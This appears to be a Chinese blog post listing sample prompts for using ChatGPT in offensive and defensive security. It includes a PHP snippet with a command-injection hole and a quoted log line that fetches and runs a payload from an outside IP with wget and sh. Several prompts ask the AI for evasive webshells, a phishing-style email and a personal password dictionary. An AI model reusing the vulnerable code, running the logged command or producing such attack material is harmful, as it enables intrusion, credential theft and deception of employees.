文章目录
- Chatgpt科普
- 利用:
- 安全开发
- 逆向免杀
- 代码审计
- 蓝队应急
- APT社工学
- 其他相关:
Chatgpt科普
-
ChatGPT是什么?
ChatGPT–可能很多人被这个缩写的名字搞糊涂了,第一眼无法看出到底什么意思,GPT 的英文原文是 Generative Pre-training Transformer(预训练生成模型),业界有人将 ChatGPT 概括为聊天机器人+搜索工具+文本创造工具的组合,或者简单理解它是一个生成式 AI(内容生成器)。
-
ChatGPT能做什么?
它的主要功能是协助回答问题、提供信息和生成有关历史、科学、地理等各种主题的信息,这些信息仅限于它所接受的训练,但其知识在不断扩展。 -
ChatGPT牛在哪里?
(1)它是个通用的模型,只要提示词引导,就能快速适应不同领域。
(2)它能理解你的问题,只要给的引导越多,它就能给出你想要的答案。 -
安全行业影响:
(1)整合多种恶意软件
(2)提升漏洞发现能力
(3)给新手攻击者赋能
(4)便于社会工程学攻击
(5)快速筛选和锁定目标
(6)模拟网络防御攻击技术
利用:
安全开发
1、如何使用Python写一个jwt爆破脚本?
2、如何使用Python写一个Webshell检测脚本?
3、如何使用Python写一个MS17010漏洞检测脚本?
4、使用PHP开发一个免杀混淆复杂的webshell脚本
5、在渗透测试靶机中,发现PHP脚本被禁用了敏感函数,如何生成一个绕过的webshell
逆向免杀
1、APK使用什么工具进行反编译?
2、常见脱壳工具有那些?
3、免杀中使用什么加壳效果好?
代码审计
1、下面代码会出现哪些安全漏洞?又该如何利用呢?
<?phpif( isset( $_POST[ 'Submit' ] ) ) {// Get input$target = $_REQUEST[ 'ip' ];// Determine OS and execute the ping command.if( stristr( php_uname( 's' ), 'Windows NT' ) ) {// Windows$cmd = shell_exec( 'ping ' . $target );}else {// *nix$cmd = shell_exec( 'ping -c 4 ' . $target );}// Feedback for the end user$html .= "<pre>{$cmd}</pre>";
}?>
2、Thinkphp历史漏洞有哪些?
3、shiro反序列化漏洞如何利用?
蓝队应急
0、平台项目:
蓝队针对攻击威胁感知平台项目有哪些?
1、日志分析:
103.178.229.152 - - [12/Mar/2023:07:16:02 +0800] “GET /shell?cd+/tmp;rm±rf+*;wget+128.199.134.42/jaws;sh+/tmp/jaws HTTP/1.1” 404 146 “-” “Hello, world”
2、流量检测:
写一个检测cobaltstrike payload的脚本
写一个Cobalstrike检测rules规则
APT社工学
1、防溯源:Cobaltstike如何防止被溯源
2、钓鱼邮件:由于系统升级,公司通知员工必须修改自己的密码,请在新业务网站上进行修改,帮我写一份规范的邮件通知
3、字典生成:用户名:xiaodi 电话:13512345678 QQ:471656814 密码组合?
其他相关:
网络安全渗透测试简历模版 早知道前几天投简历就用这个了 emmm
网络安全渗透测试报告模版